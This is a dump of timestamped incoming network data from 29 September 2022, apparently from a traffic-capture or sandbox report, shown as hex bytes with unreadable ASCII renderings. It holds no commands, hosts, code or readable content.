                                                                                                                                                2022-09-29 12:51:25 UTC3001INData Raw: ba 6a 8f 76 2a 81 d3 4a 23 f1 0b 4d ac 62 e4 07 3f 48 b7 ef 17 6f dd 7c 4f 80 22 29 ef e4 be b2 a8 31 11 af 3a 67 62 2a a7 b8 77 07 54 6d 56 3f 4d 47 03 5b 0b 98 ae c0 15 7f 9b 84 8d 43 41 80 17 35 fd 88 2f c9 3a 48 43 de 26 06 46 26 9a 90 3e 3f 4f 5e 06 8b 09 eb ef b4 c2 01 f4 6a 38 2e 8e 19 ea 91 b7 f7 b2 6a 34 36 f0 2a 62 12 83 64 4e f2 c1 3f 25 f6 c7 ea 7f f6 46 53 7d 94 75 d0 f6 2e 85 ff 61 14 92 b3 e0 57 38 e5 0c 6e 5f 14 a2 ac ef 06 9e ef 3d d1 7f 83 54 2a e7 7c dc 56 1c a7 4f bf 6e dd c7 bd 08 e3 ab af 6f 0e 0e 7e 8b d3 ca 13 98 cd 18 76 a8 f6 b8 bc 66 93 5e a9 1c e2 f6 7d 20 22 3c 87 3c 54 51 0d 0b 6a 0a e3 55 ee 61 e9 fe c5 42 2e c9 72 2f 9c b3 9b 5b 32 c0 10 44 2d 9e 21 80 af cf 08 13 a4 8d 74 bc ce 18 88 77 51 bf 73 0c 72 81 38 e5 b5 7e 9f ce
                                                                                                                                                Data Ascii: jv*J#Mb?Ho|O")1:gb*wTmV?MG[CA5/:HC&F&>?O^j8.j46*bdN?%FS}u.aW8n_=T*|VOno~vf^} "<<TQjUaB.r/[2D-!twQsr8~
                                                                                                                                                2022-09-29 12:51:25 UTC3010INData Raw: b8 8f 5b 20 c8 ba 27 fc bc 72 c1 e6 00 12 ce d0 a9 cd 05 89 5b ba 79 31 86 b6 4f 09 35 8d b0 c6 c7 4d 89 22 f7 c3 9e fc 3e 9f c3 ac 4a ec 87 80 b6 21 61 c2 4d cf 6b 6b 30 29 ab 11 5c 27 25 7a f7 e9 7e fe 86 eb 20 e6 94 73 28 8a 9b 79 2c b4 18 d2 a3 0f e6 d7 ae e4 ec 01 85 01 cd 82 c9 51 c2 ac 70 fd 0f ea ab 3e 1e 8d 7d f0 77 3a a9 48 8f 4f d8 3b 52 66 1f 85 68 21 7b 2b 79 fe b7 1f e4 30 34 87 bd b6 c9 b6 83 23 c6 e0 7c 21 b8 5b ff 00 55 b7 ce b4 97 e5 33 eb 84 eb 41 4e 37 3c 1e 64 19 48 35 54 28 bc 91 38 c5 31 4c db 7f 68 72 af 25 95 58 23 aa 40 60 05 3f d1 b9 cc 04 04 6d 01 62 35 4b c9 be f1 a9 02 3a 7f cc c4 cd b0 91 1c f3 e2 54 46 58 ab 43 b7 88 99 fc bd e0 c1 2c cf 66 ae 76 3e 31 c7 ea a4 8f 97 20 d3 7d 77 17 02 a9 bc 2f 2c 09 99 8d cb 18 c5 70 ff 93
                                                                                                                                                Data Ascii: [ 'r[y1O5M">J!aMkk0)\'%z~ s(y,Qp>}w:HO;Rfh!{+y04#|![U3AN7<dH5T(81Lhr%X#@`?mb5K:TFXC,fv>1 }w/,p
                                                                                                                                                2022-09-29 12:51:25 UTC3026INData Raw: ca 7c f0 70 5d 10 ed b0 f0 62 c7 cc 2e f1 f1 c4 aa 4c 6d 8c 66 06 0e 4b c0 a8 ed 4f d4 90 59 c8 c7 3d 71 33 a5 cd 44 2b d7 6f d2 2d ac 45 51 83 13 6b 5d 7e 6c cd 41 2d 77 9c f4 7a 2f 52 43 39 a8 77 b7 1d 49 5f ad a5 f8 ec b2 01 6c e2 6d 63 da cc 81 59 c3 56 68 08 b5 09 ba 33 c3 a7 44 76 56 fa 19 bc 96 ab 3f b1 8e 6a 2c 0b 16 8f 40 3e 69 00 8e 3f ca 0f f9 3c ac 6c e5 b9 37 6e da 52 c9 c8 65 a7 86 7f 42 0e 7f a8 17 2e f9 4e 37 cd 3e 53 16 59 25 e7 f2 4d 46 d0 13 85 83 62 00 49 89 61 88 23 1f ab 94 af fc 59 e4 b9 7c ca a9 54 15 58 77 9c 53 ba 59 ee 5a 23 59 39 e0 d0 77 ef 35 17 51 00 17 61 d9 58 c6 e0 73 26 2d b1 4f ba 8a 8f f4 e5 eb 1b 8e 45 72 81 a6 ff 53 06 d3 75 5f 33 41 d8 84 32 41 92 ba a3 56 94 bb 59 01 94 2d b5 41 79 d5 b4 77 97 46 03 33 0d 74 c9 af
                                                                                                                                                Data Ascii: |p]b.LmfKOY=q3D+o-EQk]~lA-wz/RC9wI_lmcYVh3DvV?j,@>i?<l7nReB.N7>SY%MFbIa#Y|TXwSYZ#Y9w5QaXs&-OErSu_3A2AVY-AywF3t
                                                                                                                                                2022-09-29 12:51:25 UTC3042INData Raw: 53 9f 9c 5b 58 5f 03 38 e6 7e 84 2e 9d 58 21 0f 6a 8a 8d c1 4c 5c 6e 1a 93 9f 73 45 ed 44 54 ea 1d ac f9 76 ed 6e 97 13 e3 34 22 b3 42 43 aa 62 5d 60 ec 97 47 4d 29 c3 cd 61 b4 ff d6 d5 a2 35 63 37 ce 88 93 5f bb 6c 39 61 b6 08 4f 66 e6 97 29 54 57 11 39 7f 27 a9 89 c6 9d 85 37 5b 8a 58 a9 63 d2 ce bb 5e d6 5e 52 04 c8 18 3c 4c 3e 86 14 11 2a 94 d0 2f 62 b4 60 9a c6 ea f2 7a ee 2c 63 7b 9b d4 46 56 b1 1d 8c a9 04 32 a4 89 78 ec 42 c6 34 42 8d ef 02 d9 94 3e 95 3f 98 84 07 9f 5d 1e 16 02 6d 0b 6a eb 6f 30 db b2 d7 15 2d 19 ac 76 d9 48 70 00 bb 5a 62 de 32 81 68 8d d4 77 bd d4 4a 53 46 35 6d 9e dd 18 98 cc ac d5 43 fb b8 d3 26 11 49 5c 23 c0 3d f2 54 15 cf 9c 29 ae 88 5d f5 34 51 4e d6 31 93 79 71 4b 9e 25 1a ed b3 3f 98 62 ac 6f 86 27 d0 1c d6 87 e8 7f 7a
                                                                                                                                                Data Ascii: S[X_8~.X!jL\nsEDTvn4"BCb]`GM)a5c7_l9aOf)TW9'7[Xc^^R<L>*/b`z,c{FV2xB4B>?]mjo0-vHpZb2hwJSF5mC&I\#=T)]4QN1yqK%?bo'z
                                                                                                                                                2022-09-29 12:51:25 UTC3058INData Raw: 67 af ea 99 cd 54 91 3c 4e 01 83 ae b6 42 0e bf cd 13 2d 9a ca 7f a7 65 51 d5 d3 c0 19 bb 54 98 d1 99 37 f3 b8 69 09 77 ba 86 39 65 c3 9a 63 2f 78 d8 3d d3 c5 bc 32 fc 03 a2 f2 65 aa 0e 26 71 c8 46 ce 73 2e 4a 6b 51 20 e1 0f b5 10 f0 30 f2 8c c5 cb 4a 19 19 bb 33 97 f0 eb c8 b3 db 18 75 fd 7a d8 d7 e9 02 74 ea 5d 32 65 51 65 90 25 29 49 18 12 50 c9 93 7c 75 5d 4e 33 d9 1d 6f 15 18 8f 25 66 3c 54 78 4d ef 36 aa 04 cf ab ca 29 6e 4c 20 e9 ad 31 ff 47 e1 05 cb 0d 0a 9d fb bc fb 59 a6 f5 a7 9a 4d 8a 32 25 78 b6 6c 33 63 5e 87 07 6d 16 9c a0 14 d3 1c a5 7f 05 aa 29 03 fc eb 63 0e 42 03 fe 80 0a 33 25 c1 cf dd 53 4b 75 95 00 f9 da 7a 82 89 ff 24 70 f4 03 56 15 de c5 1f 35 36 d6 6a cb b7 04 61 68 4f 91 81 ba d8 61 1d 2e 0c 03 cf 55 d4 e3 af 1c 84 a9 22 8f 6b 68
                                                                                                                                                Data Ascii: gT<NB-eQT7iw9ec/x=2e&qFs.JkQ 0J3uzt]2eQe%)IP|u]N3o%f<TxM6)nL 1GYM2%xl3c^m)cB3%SKuz$pV56jahOa.U"kh
                                                                                                                                                2022-09-29 12:51:25 UTC3074INData Raw: bf 54 29 ff 7f 54 69 13 97 51 b3 01 13 7d f2 86 da aa 8e 0d e0 bb 58 ac a4 21 c5 74 96 4e ec a9 d4 03 36 3c b7 8b 27 38 55 e0 74 40 a2 58 54 31 60 89 6a ec fd a5 40 08 95 a8 ae 93 72 75 52 1d 43 71 f2 a7 9f 75 46 2f c0 f8 de a3 ac 27 02 d1 d0 80 f8 27 5b a8 ed 8a b1 38 00 63 f9 14 eb 22 b0 3f f3 a6 1e cf a3 22 b2 ad d8 74 e3 99 3f 4a d5 55 79 6d 58 36 d5 50 9a a1 a8 ba 86 13 ec 36 04 0c 07 25 f4 6e b7 28 89 12 26 80 66 21 da 65 75 e6 2b 70 51 bc 27 f0 ff 22 d4 3c a4 2e be 0e b5 40 9c a5 59 e2 61 5c 2d ae a8 2b 30 a0 f5 36 f4 fd f6 7d 56 27 c1 3e f1 7f ad 82 d4 c2 47 e0 ee 3c b5 86 ef 31 78 a2 ef 9a 0d be db ef 44 38 14 5f 15 d6 bc 43 20 b7 3d bb 7b 55 08 cb 01 25 71 78 3b e5 02 4d f7 24 1f 13 49 96 4d 94 05 62 72 32 b0 4b 3b a2 e5 66 54 4d dc d6 0a 52 a4
                                                                                                                                                Data Ascii: T)TiQ}X!tN6<'8Ut@XT1`j@ruRCquF/''[8c"?"t?JUymX6P6%n(&f!eu+pQ'"<.@Ya\-+06}V'>G<1xD8_C ={U%qx;M$IMbr2K;fTMR
                                                                                                                                                2022-09-29 12:51:25 UTC3090INData Raw: cd fe 53 2f d2 14 84 19 79 3a fe 90 b8 12 ed e8 d1 3f c4 43 c2 cb a1 a6 82 0f fe d0 5c f9 5d 4a e3 6c d1 68 77 e2 6c d5 df 15 3b 60 f6 b9 42 8e bd 09 f6 87 80 ed fc 46 cd 6c 04 87 99 77 65 cd f2 1a f9 59 18 ed e4 89 5b 26 0f 2d 68 75 71 16 b0 b1 a6 43 11 25 71 5c 42 be 07 95 91 f5 37 73 68 88 a1 65 29 d0 33 f7 a1 0c 3b c9 d6 23 c6 61 1d 25 54 84 a7 23 c9 b2 b8 cd 96 07 fc 5d d2 8e 97 2f 3c f1 1a db 96 b3 ce f1 10 03 ea 22 77 69 27 73 82 48 89 99 b9 34 18 15 2f 51 44 bb 34 47 4f 23 c0 26 bd 30 17 ab b1 80 3c cc 47 ad 11 96 8d 05 49 2a 04 bc 4e 84 a3 fe 83 0d 7e 1a 0b 20 88 54 d7 f6 71 23 2f 11 5a 7b 25 c6 cb e5 d6 2e b2 9a 44 03 19 29 9e 52 1b 38 71 36 73 e2 7e bf 30 aa 15 6b 0f f1 b3 93 a2 b7 f0 5f 58 3f 5e 8f ba 74 4b c1 b0 b8 18 e2 2d 6e 60 c0 2d 00 ae
                                                                                                                                                Data Ascii: S/y:?C\]Jlhwl;`BFlweY[&-huqC%q\B7she)3;#a%T#]/<"wi'sH4/QD4GO#&0<GI*N~ Tq#/Z{%.D)R8q6s~0k_X?^tK-n`-
                                                                                                                                                2022-09-29 12:51:25 UTC3106INData Raw: ae e0 fb 6c 82 32 44 87 77 3f 9d 90 74 a4 03 cd a4 89 69 86 bd 95 86 00 4f ec 96 8e 28 1e 6b 49 03 4e 49 4d a6 34 3c 7a 87 29 65 c4 2f 34 2c 58 d0 bd ae 86 78 98 e6 45 42 74 63 69 2c ad 0a 31 61 68 d8 39 d1 f2 6a c1 20 22 bb f1 5b b9 60 6f 96 74 5a f7 6e 24 4c 50 b7 09 d7 f4 93 98 e6 b3 f2 c6 36 70 48 ed 01 62 9c b8 f0 48 ac 1e ec a9 09 5d 07 7e 10 1f 37 eb f7 52 57 33 66 45 5a 61 d9 d0 70 81 ea 17 cd 3c b4 d0 75 84 92 18 75 6a ab 84 2c 33 bb 95 00 b3 f9 4b ef 7d 0f 86 ea e8 a7 49 4c 30 74 f7 ad 7d 76 3e 87 af 83 ce 7b 1c 1d 15 a3 76 bd fc 8e 62 aa cb 50 ba 81 5b b1 62 71 8a 85 fc c4 af 23 2c 12 21 57 17 cc 00 bd 22 0a ef e1 de 32 e0 ff c9 25 f5 b9 85 af 91 86 0c 3f d4 d2 ff 5b 56 ff 0f 12 52 e3 3b be c9 01 a4 0e 54 50 b9 07 e1 cb 62 a0 2d ca 5f 1d 83 75
                                                                                                                                                Data Ascii: l2Dw?tiO(kINIM4<z)e/4,XxEBtci,1ah9j "[`otZn$LP6pHbH]~7RW3fEZap<uuj,3K}IL0t}v>{vbP[bq#,!W"2%?[VR;TPb-_u
                                                                                                                                                2022-09-29 12:51:25 UTC3122INData Raw: c6 4e 6f c3 ef 00 76 a6 af 3b 24 9d 3a 97 a7 b1 00 2a 6b 85 41 14 00 80 7f 0e e2 3f e2 9c 11 11 bf 21 e7 e6 f5 bb 3a b1 03 8e f2 70 00 c8 a1 a7 9e de d8 73 a6 bf ea 3d f5 5a 1e f6 e4 26 6c 84 79 86 f9 16 f6 c1 5a cb a4 fb ee 0b f4 06 4c 27 00 8e 6a b5 8b 71 49 35 a2 ad 15 e1 55 d1 be ad 65 d9 c5 5c c0 dd 08 ef cb ef 4c c1 be 83 e1 ca ad 03 7c 6b d9 31 a1 e1 9e 05 d5 30 16 cd db ad 77 17 d4 3a e5 a6 cc b5 1b 7e 6d c3 1a 42 bf 47 cb ec 5a 59 18 da 54 40 ce 07 00 f2 03 76 9e cd 94 5a 6a 41 a8 c1 23 d4 d3 6f 3f 8f d4 8c 87 49 36 54 ce 49 4c c3 fc 0a 09 e2 7a 5c d9 df c1 50 b6 a9 72 27 42 b1 89 64 39 1c 2a 69 09 90 35 9c ba 35 98 4a f2 9e 8e d3 b4 b4 95 45 81 fb c8 af b8 8d 61 20 c9 43 cf 8b ef 53 4b ee 21 66 38 f5 67 f3 1a 85 b6 32 b8 08 f5 b6 d1 03 11 73 87
                                                                                                                                                Data Ascii: Nov;$:*kA?!:ps=Z&lyZL'jqI5Ue\L|k10w:~mBGZYT@vZjA#o?I6TILz\Pr'Bd9*i55JEa CSK!f8g2s
                                                                                                                                                2022-09-29 12:51:25 UTC3138INData Raw: 97 fd e8 3b 6c c7 84 f9 c0 12 54 a6 00 7a 68 c3 6c 35 25 0f de df bf 35 e0 ff 79 75 12 6a cc 05 18 38 28 89 c6 83 ba a9 ba 13 68 ae 60 5e 79 79 37 a4 45 25 1e fe fb 07 af ef e0 08 2b e9 5c a3 a3 19 50 d9 7c 0a 55 77 d5 57 20 1d a1 75 9b f5 4b 80 da 36 67 57 96 d5 16 d2 81 2b 84 b6 e2 ad b5 c4 88 20 b2 93 00 7d 98 71 53 c6 a1 fd 43 bd 59 12 44 f3 e3 c4 88 58 3a 2a 50 78 ec 3d 27 2a dc 09 13 3a 7e 39 11 a1 aa 3d 4f df 24 62 34 b0 06 04 8f b7 62 bc 98 12 d0 3e 45 3a fd 6b e8 fa 83 cc 3b ed 87 f3 77 db 05 d9 f3 88 d0 28 4b af 1f de e8 60 b0 e6 c4 96 da 0d d6 60 c9 64 70 28 dd bc 0b 36 de 2f 49 15 16 65 bd 6a 15 b2 34 c7 2b a8 c3 fc e9 86 0c c6 29 58 aa fb 2b e8 9d b4 79 19 19 3a 57 ae 5a 70 bb ec ae 32 de 39 17 f8 76 c5 93 1d 88 be 8e b1 57 ea 72 95 a7 1c 7b
                                                                                                                                                Data Ascii: ;lTzhl5%5yuj8(h`^yy7E%+\P|UwW uK6gW+ }qSCYDX:*Px='*:~9=O$b4b>E:k;w(K``dp(6/Iej4+)X+y:WZp29vWr{
                                                                                                                                                2022-09-29 12:51:25 UTC3154INData Raw: d8 b4 b0 2a d7 45 f0 e9 cf dc 0c 78 df 23 d4 fd b5 7a 44 9b 11 47 3f 53 0e bb 26 03 99 82 38 1f 6f dc d2 70 58 0f ea a3 3a 3f 48 7f a2 86 b8 60 48 88 97 52 7d 03 52 80 5e 17 89 16 07 9a 77 54 10 f7 1d b7 85 65 43 6a 84 1e 4f 6c 1a 3d 29 9d ab 12 2f 0d d2 f6 0d d7 67 54 2c a5 6f 6a 10 f8 8c bc 36 f8 c5 c2 15 15 0f 7b e2 d2 46 2a 95 5a bd cf d9 cc 65 b1 d5 8e ed 19 5c 48 35 f4 5f 98 05 51 43 e3 4a 52 a8 12 4b 0d b8 c5 e6 90 a3 02 9a 83 88 4b 09 4a 1c c7 91 e0 4d c1 75 d4 2e 85 5d 20 62 25 be 13 a5 0e 2f 43 8b 78 ba 3a 52 c4 9f ce 4c 1b 0c 23 7a 1f 51 1b b3 ef f8 7d 6f c5 ad 68 4a 78 19 9a 67 88 65 42 6b 58 68 79 79 e6 0b c7 fc 33 0f a8 db 5b c2 82 e4 a9 5f 10 36 5d 4a 08 f5 0c 31 51 12 45 07 cc 46 81 15 87 7d de 72 ab d3 32 23 1a 92 4b 5e 2b 59 f6 89 e5 50
                                                                                                                                                Data Ascii: *Ex#zDG?S&8opX:?H`HR}R^wTeCjOl=)/gT,oj6{F*Ze\H5_QCJRKKJMu.] b%/Cx:RL#zQ}ohJxgeBkXhyy3[_6]J1QEF}r2#K^+YP
                                                                                                                                                2022-09-29 12:51:25 UTC3170INData Raw: 9b 64 69 de e3 dd 85 d2 c6 81 70 6a 78 32 e8 af d5 f2 74 c7 c9 bd d2 e4 20 44 8f 95 9f 2b 28 fc 77 ee d1 51 7a 02 0e 1c ed 6f 7c ec 58 8a 62 47 fb a0 d2 bd fa da 08 bd 94 86 31 06 f1 df 7e a4 12 bf f6 08 2d 6c a6 59 f6 20 99 1d 29 07 c0 0a c5 35 47 a3 b8 6d c2 5f 1e b3 b3 e6 fa 3f bf 92 31 1c 2c 2d 19 72 08 a0 5e 9d d4 4a a5 b7 db c9 cc a3 85 6a 20 a5 87 c7 28 9c f7 1e b1 92 7f ea 2b 08 45 5e 6a a9 49 db 42 ae db 3b 3f 7c 71 ca 3b f1 65 4c 39 6c 30 23 9b e0 a7 c9 16 b9 16 9b 94 15 df b9 4a 94 cd c4 7d 95 5d cb 8b df 02 fa 35 cd 9a 7c e4 bf fe f6 6d b0 96 c4 83 da 07 e7 82 75 2e 4e b5 6b 90 ff c9 92 0d b6 e9 1c 43 63 a1 9e e3 c7 60 4f 94 c4 16 ff 52 ac 8d 83 68 e8 01 a8 40 a3 cb 18 c3 a3 66 23 2d 01 27 28 d6 2b 0b 4d 41 48 e5 8a 1a f6 4c 7f 8a 90 35 b6 64
                                                                                                                                                Data Ascii: dipjx2t D+(wQzo|XbG1~-lY )5Gm_?1,-r^Jj (+E^jIB;?|q;eL9l0#J}]5|mu.NkCc`ORh@f#-'(+MAHL5d
                                                                                                                                                2022-09-29 12:51:25 UTC3186INData Raw: b5 c9 e1 7d ba 43 eb 32 42 41 13 5f 7c 09 83 c5 d6 b6 38 b5 2d a8 fb ca e0 63 8b 75 1b 19 fd e6 b3 7f 59 49 a7 69 a9 3f b9 a7 1c e8 d7 2c 5f 42 9d ac fc 07 85 35 37 35 24 62 98 b1 bd 47 8c aa 2a 32 5f 43 af 8f cf 39 9b 79 0e bb 40 80 56 7f 76 85 3f b2 8d 71 ab fa e3 46 f9 6f 04 94 97 80 cf 8c 0c 99 85 2e 4f 27 72 0d 6a 6c a8 f6 2f 6c a4 26 c2 1f 49 7a 02 4a 94 76 9c 3e 66 68 78 56 97 c0 bd 06 97 38 9d f1 64 c9 14 38 e5 38 69 eb b0 83 14 74 89 c4 3f 0b 74 43 c5 ff bf 0e b3 e3 12 6f 7c 55 ed 75 ec ef c7 dd 57 b9 5f 2d 15 13 e1 06 0d 09 53 a3 fd 92 7a 70 74 e4 1e 68 17 7d ff 6d 45 5a 9a 51 fd 65 f2 6a 6e f9 52 7d a9 9d 75 a7 1e a4 58 1b 3a 32 75 6a 1f cc 37 84 7d 4e 80 66 45 2b 05 78 07 19 53 5d d6 c9 dd 1e 85 2c 73 e5 a6 81 b2 7b 13 0d 16 c0 c9 06 a7 cb 3e
                                                                                                                                                Data Ascii: }C2BA_|8-cuYIi?,_B575$bG*2_C9y@Vv?qFo.O'rjl/l&IzJv>fhxV8d88it?tCo|UuW_-Szpth}mEZQejnR}uX:2uj7}NfE+xS],s{>
                                                                                                                                                2022-09-29 12:51:25 UTC3202INData Raw: 33 23 d8 b7 68 78 e4 39 57 d3 be a3 b6 9f f2 8a da 7b 29 5e 77 11 67 73 05 45 f8 26 a1 d7 a7 d7 95 8c e6 ef 5a f4 12 41 da cd 32 86 1c 27 fd f0 f6 3c 1a bd 9a 8c 17 ea 90 99 16 fc 81 f3 02 47 92 f5 c3 22 ba b1 56 7a ee 57 9f 51 f5 22 35 de a1 ba 02 f8 6a fa de 59 83 24 02 19 a7 0d b9 be 5f e9 d5 57 9c 11 85 f2 89 70 51 32 8f fc 51 56 69 e8 59 8f 1f ab 1d 56 50 9b f5 24 5d a1 dc a4 e5 9f d7 48 13 d1 e8 37 19 12 bf ba 1a 42 d8 0a d0 9e 42 f8 c1 b7 14 30 25 8b e1 ed dd aa 74 cf 40 b5 53 97 b6 a4 d7 13 b5 91 41 47 d8 05 bc 8e 3c 6a 06 15 63 4e 0b 0f 33 79 21 a7 e2 26 53 31 18 9e 56 ea ef 5e 75 10 73 12 7d 09 38 ae 55 2c 4a f6 be 83 18 c6 ae 7d a7 8c 03 1c bc a9 bc 4f c9 ab db c0 f4 f7 69 2e 47 75 5b c3 fb aa 3a 17 9a 3e bc fa 1d a6 f5 26 79 f4 d0 bf 93 5e 15
                                                                                                                                                Data Ascii: 3#hx9W{)^wgsE&ZA2'<G"VzWQ"5jY$_WpQ2QViYVP$]H7BB0%t@SAG<jcN3y!&S1V^us}8U,J}Oi.Gu[:>&y^
                                                                                                                                                2022-09-29 12:51:25 UTC3218INData Raw: f2 ec 37 3c 94 84 87 fb bb 42 e2 52 c8 48 d3 16 d7 db fd fe d9 1d f0 0c d7 6e ad b6 ee 57 61 e8 bd b7 91 b9 52 06 e9 f5 a7 c9 85 f6 64 a4 eb 1c 1e bc e5 44 e5 09 3b 89 3e f0 62 1a e9 45 af c7 65 de ae 38 97 87 ea 2e 11 c0 59 1f 52 a1 bd 54 93 c2 4c 6e 09 cf ae e1 9e 92 5d 84 10 22 b8 09 42 8a 52 0e 50 94 84 de 1b 55 09 3b 44 4b b1 35 8e b6 22 20 bd c0 ac 50 c7 99 18 2a 80 bd 9b a1 66 d3 37 a1 a8 61 2d 6c 76 b6 ff 43 f9 d2 7e cc d0 88 ed c8 db 63 90 78 81 a9 f8 3f a0 30 62 b6 62 3a 38 71 31 59 5a c1 3f 72 cf e0 dd 7f 92 fb 7b 41 11 f6 8c ff a7 4d 51 ce 6b 26 4b c4 9b 07 6c cb dc e6 2c d2 ad f9 9f 8c 30 39 ca b0 52 3f 1f df cd d6 73 cb bc 3d a0 24 cf bb 97 c3 10 4c fa d2 82 00 e0 e9 7e ff 9c 80 7d d9 6f 46 2e be ca 2e 48 01 9d bb 72 7f cd a9 0a 41 14 36 76
                                                                                                                                                Data Ascii: 7<BRHnWaRdD;>bEe8.YRTLn]"BRPU;DK5" P*f7a-lvC~cx?0bb:8q1YZ?r{AMQk&Kl,09R?s=$L~}oF..HrA6v
                                                                                                                                                2022-09-29 12:51:25 UTC3234INData Raw: 7f 86 06 40 b9 62 04 7a cf 2b 1c b6 de cc 0c fe 17 95 c8 2f eb 3e bf eb e3 22 95 f6 61 df a1 74 b5 e1 83 7d 2b 6c a2 95 88 c2 23 49 05 cb 36 ea ce 8d 31 df 0a f0 fe cd 35 ec 64 41 25 c8 ee fe b4 ab af 3f a3 9f cd 31 07 4d 44 34 27 01 d4 b1 ce d0 ed c1 83 12 38 bf 68 23 8f 85 ab ab 15 97 5c c1 13 3e 6a 0b 6e d7 56 17 75 7f a7 f8 a0 4a 05 cc 33 09 41 b5 a4 24 f5 79 62 cf 59 ed 0b 12 4c fc 24 bf d7 eb f5 e7 6e fa 60 2b 4b 22 49 3a ae b9 aa 88 45 22 89 3a 5f 19 26 a4 a7 3d 20 e4 e9 6a 2d 2b b1 c4 1a e8 a2 31 4e ee 2a ce c2 06 d7 90 a4 37 d2 a2 a9 86 f8 75 6d 6b db 0d 64 ee ac 8b fc 0c 9e b3 e5 15 25 39 7f f8 1e 27 39 82 a4 5c 9f 04 52 2f 27 25 f5 52 a2 96 75 2e af 79 2d 13 db d6 99 d8 66 3e f8 e7 a6 71 f8 4c 2d 86 91 97 0d 35 4a 05 36 f4 ff 54 a9 7f 00 46 21
                                                                                                                                                Data Ascii: @bz+/>"at}+l#I615dA%?1MD4'8h#\>jnVuJ3A$ybYL$n`+K"I:E":_&= j-+1N*7umkd%9'9\R/'%Ru.y-f>qL-5J6TF!
                                                                                                                                                2022-09-29 12:51:25 UTC3250INData Raw: ce 3e ad 20 da 2f 23 8a c9 07 5b 1f 4a 44 9e ab 8a f2 b7 8d 84 31 2c 87 cf 55 23 ed 21 29 99 37 ed 2d 0d 4f 9d 26 ce df 70 8f ac 10 e3 0b 34 aa ee 46 11 d5 00 46 e0 ac 4e c9 b1 22 77 89 c0 a2 61 d7 60 35 71 4c c6 87 7f e8 1c 82 17 2f 8c 12 05 b5 0d 20 c4 b4 c4 9c ee 85 a5 c1 86 2c 29 35 e3 7f 8f 19 52 e1 33 4a 34 2b e6 86 8b 58 80 0a 2f cb 9d f9 4e 1f a3 38 0e 87 84 28 1a 07 23 e9 e3 c1 d1 70 9d 3c 0e be 56 cf 6e bb 7c ea 38 a5 dd 16 d1 6f 50 0b a3 82 1e c8 0f e5 22 6b 02 76 59 c7 50 4b ba 17 fa aa fb 3c 50 41 18 96 a7 bd 20 b2 61 69 8f 41 28 8d e2 9d 11 a9 8e 35 07 99 c8 0b c0 69 35 9f 56 58 7a 38 7c 14 71 85 86 7e 73 15 b4 7d 4f 43 f0 bf 5b 57 7d ed 41 a2 40 41 8c 2c 74 a0 e1 ef 4e b0 30 c5 8e be f4 ec c7 71 df 09 33 56 73 53 eb ca a7 a2 73 94 c4 dc 6a
                                                                                                                                                Data Ascii: > /#[JD1,U#!)7-O&p4FFN"wa`5qL/ ,)5R3J4+X/N8(#p<Vn|8oP"kvYPK<PA aiA(5i5VXz8|q~s}OC[W}A@A,tN0q3VsSsj
                                                                                                                                                2022-09-29 12:51:25 UTC3266INData Raw: 6f c9 0d a1 f5 16 e4 84 dc d9 b0 29 7e 9e 07 c8 e3 30 26 e1 34 f3 db 17 0d 19 81 3b 13 0d fc 48 27 8a 6a 11 ce 3e 32 b1 75 1d f3 09 58 2b 2e fc 46 86 d0 99 4b a5 07 a7 e3 78 4f 99 b3 37 52 d6 99 d4 9e 3a 4d 9c 6f 4c 32 3a dc 90 47 2c 4e 2d cd 9c 25 ce f6 d4 eb bf 15 92 f1 35 24 0f 0e 68 3a 29 45 fc ba 17 29 78 06 b1 7a 6b ea be 04 21 ff 96 28 42 a1 6f d1 6d dd c1 cb 6e d7 22 29 f7 3a de 5b ac 13 b7 de 84 0f 51 1a e0 e7 e6 d1 ce a5 c8 8a 04 10 68 c8 d3 06 17 b0 31 2d ff b3 20 ce 1b 3e 9a 42 f2 56 bf f2 45 8f 1d 84 3e 0c b5 4e 3c 8c 62 c9 17 86 6f 03 a8 da 38 2c 3d 27 a5 28 9c 93 fa b9 8d c9 7d 27 41 3c 91 f9 e0 94 9f 16 3d 8d f1 45 00 5e 1f f5 de 79 22 d8 46 b1 2e 7b 10 ba a5 32 99 19 c3 06 50 84 34 2f 8d 8c f6 11 90 66 2f 19 f8 ed 4c 41 da 09 17 11 d7 fa
                                                                                                                                                Data Ascii: o)~0&4;H'j>2uX+.FKxO7R:MoL2:G,N-%5$h:)E)xzk!(Bomn"):[Qh1- >BVE>N<bo8,='(}'A<=E^y"F.{2P4/f/LA
                                                                                                                                                2022-09-29 12:51:25 UTC3282INData Raw: 24 93 f3 ce 31 cf 33 52 54 5b de 14 65 ab 8f 74 f2 35 5b aa bb 8c 08 83 8f 5b 46 16 c8 59 5f a0 93 f7 d1 4b 25 17 eb ad 97 97 30 86 2c 34 ae 36 9d 30 94 91 03 24 93 a3 41 a2 e8 08 7f cc ce 27 17 6f d1 95 05 86 6c a9 dd 03 af a5 2f 03 6d 78 b8 74 1e d8 46 44 69 b3 de b4 82 37 33 ed 57 cb d7 19 f4 52 0b 5f 34 80 f7 0d 0c 41 21 34 97 b5 3a e3 99 93 18 7b bc 05 8d 7c 55 94 aa 15 b8 97 96 5b ef 5c bc 74 d9 82 20 d3 a5 5d 5f f5 2c a3 cb 27 27 a0 f2 06 18 21 7c ea c6 99 38 f3 a6 67 9b 07 fb 5d 32 cc a0 da d7 72 f3 6a 0b 8d c5 5a c0 b7 5e 42 3e 77 b9 d9 56 04 27 88 cb 17 34 c3 09 f1 23 c3 86 54 3a d4 43 98 a5 14 d9 f6 59 66 81 b1 53 3d 81 02 cd e5 97 7d e9 ee 03 1b bf 85 21 08 10 77 24 7e c6 f4 42 da 78 95 2c 8c 8b 77 6d 4a b1 ae 24 dc 19 90 1b 47 64 0b 75 06 b9
                                                                                                                                                Data Ascii: $13RT[et5[[FY_K%0,460$A'ol/mxtFDi73WR_4A!4:{|U[\t ]_,''!|8g]2rjZ^B>wV'4#T:CYfS=}!w$~Bx,wmJ$Gdu
